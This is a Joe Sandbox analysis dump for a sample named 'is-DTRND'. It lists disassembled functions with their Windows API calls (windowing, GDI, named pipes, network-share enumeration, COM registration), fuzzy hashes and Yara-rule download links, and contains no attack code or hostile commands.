Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 68d932db4689e114aee9658c5227d6ca8a691041475f589188673913b12cc760
Instruction ID: 954f68671e0f677be55c5b6586aae97ede79eb7a3530a01ec67f03a117e7fc77
Opcode Fuzzy Hash: 68d932db4689e114aee9658c5227d6ca8a691041475f589188673913b12cc760
Instruction Fuzzy Hash: 0011BF70E022445BE715AB699C86F1E37A5A786B0CF44487BF40067AF2D77CB880C76D

Uniqueness

Uniqueness Score: -1.00%

Function 00473650 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32 ref: 0047365E
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,00465D19), ref: 00473684
GetWindowLongA.USER32 ref: 00473694
SetWindowLongA.USER32 ref: 004736B5
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 004736C9
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 004736E5

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: d39bea5b712bfdc9735a60e0145ecc3e7a96a44752dd36986865cf0652838775
Instruction ID: cc5d0bd8627a758d92d1c102103f7bea2d573f558d08472a26e14bce27c5c0cd
Opcode Fuzzy Hash: d39bea5b712bfdc9735a60e0145ecc3e7a96a44752dd36986865cf0652838775
Instruction Fuzzy Hash: B00140757412146BD610EF68CD41F2A37D86B0C331F054699B549EB3E2D229D8009B0C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B338 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A8: CreateBrushIndirect.GDI32 ref: 0041A813

UnrealizeObject.GDI32(00000000), ref: 0041B344
SelectObject.GDI32(?,00000000), ref: 0041B356
SetBkColor.GDI32(?,00000000), ref: 0041B379
SetBkMode.GDI32(?,00000002), ref: 0041B384
SetBkColor.GDI32(?,00000000), ref: 0041B39F
SetBkMode.GDI32(?,00000001), ref: 0041B3AA

Part of subcall function 0041A120: GetSysColor.USER32(?), ref: 0041A12A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: f29873dfcf61593aa75cb2549b6a9cf3e48997b8b5295c1044d98b88f295631e
Instruction ID: 77b069976dd3d0630739711c0f042b47a511feb73613b7c2979f61d441d75bd8
Opcode Fuzzy Hash: f29873dfcf61593aa75cb2549b6a9cf3e48997b8b5295c1044d98b88f295631e
Instruction Fuzzy Hash: 80F0BB75601500ABDF00FFAADAC6A5B37A89F043097144066B95CEF297CA2DDD608B7A

Uniqueness

Uniqueness Score: -1.00%

Function 0046E014 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 0046E06A
72E5B5A0.USER32(00000000,000000FC,Function_0006DFC8,00000000,COMBOBOX,?,00000000,0046E1F1,?,00000000,0046E216), ref: 0046E091
GetACP.KERNEL32(00000000,0046E1F1,?,00000000,0046E216), ref: 0046E0CE
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046E10B

Strings

COMBOBOX, xrefs: 0046E063

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ClassInfoMessageSend
String ID: COMBOBOX
API String ID: 1455646776-1136563877
Opcode ID: ecf6b1b36adab5c0c607c0c5491daa48661cbd09d0af7ffc92b2b2a1d3dd5697
Instruction ID: bf9fa50a147f2a7a1fd21979d2a4f48488d8ebd37f07552d0d4d7f5ff4337c98
Opcode Fuzzy Hash: ecf6b1b36adab5c0c607c0c5491daa48661cbd09d0af7ffc92b2b2a1d3dd5697
Instruction Fuzzy Hash: 0D514E38A00214DFDB10DF66D885A9E77F5EB09314F1181BAE805EB3A2DB34EC41CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004564C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 77pipeCOMMON

Download Yara Rule

APIs

TransactNamedPipe.KERNEL32(00000000,0048DF20,0000000C,0049DF2C,00010010,00000000,00000000,00000000,00456595,?,00000000,004565F5,?,?,00000000,00000000), ref: 00456528

Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68

Strings

CallHelper: Response message has wrong size, xrefs: 00456557
TransactNamedPipe, xrefs: 00456531
CallHelper: Wrong sequence number, xrefs: 0045656E
CallHelper: Command did not execute, xrefs: 00456581

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLastNamedPipeTransact
String ID: CallHelper: Command did not execute$CallHelper: Response message has wrong size$CallHelper: Wrong sequence number$TransactNamedPipe
API String ID: 1561970684-1127398157
Opcode ID: ffb694ad1e35bee1aadd5e3062ec2ba92c81d3c57b9e06c8291ffe42f330cbda
Instruction ID: 2e93eb1e0bdb189b8afc9a6ad78755c4a3fb252293179feebe95d9f813390879
Opcode Fuzzy Hash: ffb694ad1e35bee1aadd5e3062ec2ba92c81d3c57b9e06c8291ffe42f330cbda
Instruction Fuzzy Hash: D621A771A44204BFD711DF65EC42B5E77A8E748715FA1483BFE01C7296E778A808DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00404E7A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 00404F15
ExitProcess.KERNEL32 ref: 00404F5D

Strings

Runtime error at 00000000, xrefs: 00404F0E, 00404F21
`K@, xrefs: 00404EA1, 00404EAC
Error, xrefs: 00404F09

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$`K@
API String ID: 1220098344-2860380777
Opcode ID: 46db2382e64b13f836b28f0b4a4f4c7eeae605f1127beaa8ff57c6a4eae7ff20
Instruction ID: f5843219a1cd4db4f0c045c0a488b172177e128e40d0f46163d998114cd4ebaa
Opcode Fuzzy Hash: 46db2382e64b13f836b28f0b4a4f4c7eeae605f1127beaa8ff57c6a4eae7ff20
Instruction Fuzzy Hash: 2F21B270E422418AD712BB79988171E27C1939B35CF04897FE240BB3E2C63C984687AE

Uniqueness

Uniqueness Score: -1.00%

Function 00416CF4 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 00416D1A
SaveDC.GDI32(?), ref: 00416D4B
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416E0D), ref: 00416DAC
RestoreDC.GDI32(?,?), ref: 00416DD3
EndPaint.USER32(00000000,?,00416E14,00000000,00416E0D), ref: 00416E07

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 00e150e368ed395aa4cb19d220a76acfea4c7132713746b4edbbefb6b4a93cd9
Instruction ID: 3f50a158c09fa7d40c74242d7866ae8e121bb2ea373f5648e482b570019b9da3
Opcode Fuzzy Hash: 00e150e368ed395aa4cb19d220a76acfea4c7132713746b4edbbefb6b4a93cd9
Instruction Fuzzy Hash: BD414F70A00204AFCB14DBA9D985FAEB7F9EF49304F1641AEE80497362C778DD41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004148C8 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 004148FE
MulDiv.KERNEL32(?,?,?), ref: 00414918
MulDiv.KERNEL32(?,?,?), ref: 00414941
MulDiv.KERNEL32(?,?,?), ref: 0041496C
MulDiv.KERNEL32(00000000,?,00000000), ref: 004149B4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7390ee9ac16f09bdc99c1280845292df1e4ced5812246f729178c8d7ae4dc2ea
Instruction ID: b2fcc88294246e7fdf377a3e38791ba580108d4baa7c4e185119fc48081c3c44
Opcode Fuzzy Hash: 7390ee9ac16f09bdc99c1280845292df1e4ced5812246f729178c8d7ae4dc2ea
Instruction Fuzzy Hash: DF313EB0614741AFC720DB39C944AA7B7E8AF89724F04891EF9D9C7752C638F880CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00429894 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004298D0
SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004298FF
SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042991B
SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429946
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429964

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8e5dfd66703d97274265084b8db4141c868f22bca3892edfb9180d7bf1687cd5
Instruction ID: 47377c1862aa105c286af36649f9a3d734455abbd3099443d1a36276b08c5a1e
Opcode Fuzzy Hash: 8e5dfd66703d97274265084b8db4141c868f22bca3892edfb9180d7bf1687cd5
Instruction Fuzzy Hash: D5216DB07407057AE710BBA7DC82F8A76ECEF40715F5045BEB905A7791DAB8AD80861C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BC80 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0041BC92
GetSystemMetrics.USER32 ref: 0041BC9C
72E5AC50.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BCDA
72E5A7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BE45,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BD21
DeleteObject.GDI32(00000000), ref: 0041BD62

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: MetricsSystem$DeleteObject
String ID:
API String ID: 4263548647-0
Opcode ID: ebf46c03cac98e224d5af82ce3f50ae7f771ac334da26f83eeff5384ef9d9d29
Instruction ID: c65bf0c67bf8e5c994f3fd77b84131b0e4b597875354c07c771677eb7b7b2793
Opcode Fuzzy Hash: ebf46c03cac98e224d5af82ce3f50ae7f771ac334da26f83eeff5384ef9d9d29
Instruction Fuzzy Hash: BC313274E00608EFDB04DFA5C941AAEB7F5EF48704F1185AAF504A7391D7789E40DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00403DEC Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403E44
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403E4E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403E5D

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: a1d5a16539d5729e30e1d1df62381961c0ebc6718be827e074fe47fdb24492b9
Instruction ID: 8553b393521568fe2c41fe67b513b28362bdb8871c566aa6fe10746e1f77f2e9
Opcode Fuzzy Hash: a1d5a16539d5729e30e1d1df62381961c0ebc6718be827e074fe47fdb24492b9
Instruction Fuzzy Hash: D6F044613442043AE16035A64C87FA7298CCB41BDAF10057EB708FA2D1D8B99D0442FD

Uniqueness

Uniqueness Score: -1.00%

Function 004144A8 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

72E5B410.GDI32(00000000,00000000,00000000), ref: 004144E1
72E5B150.GDI32(00000000,00000000,00000000,00000000), ref: 004144E9
72E5B410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004144FD
72E5B150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414503
72E5B380.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041450E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: B150B410$B380
String ID:
API String ID: 2237492430-0
Opcode ID: d4537fdfc788aeebb9a2e69f75dd2e1211b83efa39a5fff194788b356ba8a41d
Instruction ID: 83d045a3d997561e5c3a0c06dd80eb92e83f219617ccc8c1327c6f1541475871
Opcode Fuzzy Hash: d4537fdfc788aeebb9a2e69f75dd2e1211b83efa39a5fff194788b356ba8a41d
Instruction Fuzzy Hash: BD01DF352083806BC200B63E8C45A9F6BDD8FCA714F15446EF088DB282CA79CC018775

Uniqueness

Uniqueness Score: -1.00%

Function 0045693F Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?), ref: 00456955
SetLastError.KERNEL32(?), ref: 0045696C

Strings

GetProcAddress, xrefs: 00456971
LoadLibrary, xrefs: 0045695A
HelperRegisterServer: StatusCode invalid, xrefs: 004569A4

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLast
String ID: GetProcAddress$HelperRegisterServer: StatusCode invalid$LoadLibrary
API String ID: 1452528299-1321573290
Opcode ID: 82b3930b3ebbd04eca898e3712e51c71d1ebe08aee199a6e1fecedf9574e4dee
Instruction ID: 7fc71ba1eee109a84b7e32a822ab3a0f054f86a781db50bf2e0c3a492acbb2a4
Opcode Fuzzy Hash: 82b3930b3ebbd04eca898e3712e51c71d1ebe08aee199a6e1fecedf9574e4dee
Instruction Fuzzy Hash: 59F031B06240405BCE10EB69994256A73A4EB843473D3453BAC01D726BDA3CDD0DD71E

Uniqueness

Uniqueness Score: -1.00%

Function 00424DA8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 0041F13C: GetActiveWindow.USER32 ref: 0041F13F
Part of subcall function 0041F13C: GetCurrentThreadId.KERNEL32 ref: 0041F154
Part of subcall function 0041F13C: 72E5AC10.USER32(00000000,Function_0001F118), ref: 0041F15A

Part of subcall function 00423270: GetSystemMetrics.USER32 ref: 00423272

OffsetRect.USER32(?,?,?), ref: 00424E91
DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424F54
OffsetRect.USER32(?,?,?), ref: 00424F65

Part of subcall function 0042362C: GetCurrentThreadId.KERNEL32 ref: 00423641
Part of subcall function 0042362C: SetWindowsHookExA.USER32 ref: 00423651
Part of subcall function 0042362C: CreateThread.KERNEL32 ref: 00423675

Part of subcall function 00424BF4: SetTimer.USER32 ref: 00424C0F

Strings

>MB, xrefs: 00424DBB, 00424E99

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Thread$CurrentOffsetRect$ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
String ID: >MB
API String ID: 1771318467-212926588
Opcode ID: 9c25055f4f46c9ea9ef540a80fbac8b9d8c1e78b0ba4761b28caf18b40fafde6
Instruction ID: 705f2a192e95c6edbf7467b113717681c3474608ff02e637e93cacb07322a4b7
Opcode Fuzzy Hash: 9c25055f4f46c9ea9ef540a80fbac8b9d8c1e78b0ba4761b28caf18b40fafde6
Instruction Fuzzy Hash: DF811671A00218DFCB14DFA8C884ADEBBF4FF48314F51416AE805AB256EB38AD45CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00407038 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON

Download Yara Rule

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407097
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407111
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 00407169

Strings

Z, xrefs: 004070D0

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 939149d5aa9101605caf33572431e8dff8441c543f0c6c8b5d6862fe84fd4df8
Instruction ID: fe88afd7ae99d1cd88c92d979abf1ab5c5088a5c0d84fd8041c215bac6b8633b
Opcode Fuzzy Hash: 939149d5aa9101605caf33572431e8dff8441c543f0c6c8b5d6862fe84fd4df8
Instruction Fuzzy Hash: D8518570E04209AFDB11EF95C941A9EBBB9EB49304F1045BAF900B73D1C779AF418B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00431D88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 0043150C: 76E37E10.OLE32(?,?,00000000,?,?,00431DCF,00000000,00432011,?,?,?,?,?,004321A4), ref: 00431515
Part of subcall function 0043150C: 76E3A680.OLE32(00000000,?,?,00000000,?,?,00431DCF,00000000,00432011,?,?,?,?,?,004321A4), ref: 0043152D

GetModuleFileNameA.KERNEL32(00400000,?,00000106,00000000,00432011,?,?,?,?,?,004321A4), ref: 00431DE1

Part of subcall function 00431538: 6CAD6840.ADVAPI32(80000000,00000000,00000001,00000000,00000000,?,?,00431E09,00400000,?,00000106,00000000,00432011,?,?,?), ref: 0043155D

Strings

\Clsid, xrefs: 00431E1D, 00431FC9
CLSID\, xrefs: 00431E35, 00431E61, 00431E9D, 00431EFC, 00431F53, 00431F8C
\ProgID, xrefs: 00431E85, 00431F77

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: A680D6840FileModuleName
String ID: CLSID\$\Clsid$\ProgID
API String ID: 2632562839-3614834358
Opcode ID: 3084d90feecdf774c6aee464760adea991e88dbb1489097d4054674c6568cd63
Instruction ID: 04e1f787bdd9bc7f31b98ff445f8c8b6e64685fbb5d157f68287dbba7f9a8adf
Opcode Fuzzy Hash: 3084d90feecdf774c6aee464760adea991e88dbb1489097d4054674c6568cd63
Instruction Fuzzy Hash: D851117050011C9BCB29EB11D983ACEB7B9AF48705F5055FBA504632A1DB38EF49CE69

Uniqueness

Uniqueness Score: -1.00%

Function 0042E7F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

72E5AC50.USER32(00000000,00000000,0042E943,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E81A

Part of subcall function 0041A2B0: CreateFontIndirectA.GDI32(?), ref: 0041A36F

SelectObject.GDI32(?,00000000), ref: 0042E83D
72E5B380.USER32(00000000,?,0042E928,00000000,0042E921,?,00000000,00000000,0042E943,?,?,?,?,00000000,00000000,00000000), ref: 0042E91B

Strings

...\, xrefs: 0042E8CD

Memory Dump Source

